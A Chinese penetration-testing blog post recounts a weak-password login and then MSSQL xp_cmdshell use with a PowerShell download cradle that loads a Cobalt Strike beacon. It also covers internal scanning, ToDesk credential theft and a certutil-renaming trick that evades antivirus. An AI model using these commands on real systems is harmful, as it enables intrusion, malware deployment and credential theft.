弱口令yyds

(Updated: )
渗透实战

前言

本来是找点漏洞交补天换点KB的,找资产就顺手找到了个子域名,然后打开是个登陆界面,顺手弱口令试了一波,居然给我猜对了。

火眼金睛

进到后台,是个数据展示平台,没啥功能点,连个图片上传功能都没有,截图中的头像是一个本地功能,虽然上传了图片内容做了个图片格式校验,但是只是储存在本地用,换个浏览器登陆就显示默认图片了。

image-20230302200053654

每个功能都翻了一遍,就在我即将放弃的时候,看到了系统管理的企业列表管理,这里面有数据库配置信息,于是打开我的navicat,连了一把,成功连上。

image-20230302200452895

突破

122.x.x.x

连上数据库后,是sa用户,而且 xp_cmdshell 都可以用,看了下 tasklist /svc,没有熟悉的杀软进程,直接上cs,试了下别人的cat版。

1
2
# 需要给双引号转义下。
xp_cmdshell 'powershell.exe -nop -w hidden -c "IEX ((new-object net.webclient).downloadstring(\"http://x.x.x.x/a\"))"';

直接上线成功,然后扫了下存活主机,发现c段下有不少存活主机,于是直接上fscan。期间还翻了下文件,发现了运维的辉煌时刻。

image-20230302202008801

扫描发现了内网的通达OA,而且扫出了 tongda-user-session-disclosure 漏洞,验证后发现是误报,除此之外没有什么有价值的东西。

60.x.x.x

也是sa用户,但是有火绒。

image-20230303141721448

还有todesk在上面,老版本的话可以直接把安装路径下的 config.ini 复制出来,然后在本地覆盖掉自己的,打开todesk就能看到连接码和密码了,但是这个是高版本失败了。

用certutil下载cs马,可以将它复制到别的地方改个名字然后再执行,就可以绕过火绒了。这里我用了下掩日的免杀,成功绕过。

1
c.exe -urlcache -split -f http://x.x.x.x/m.exe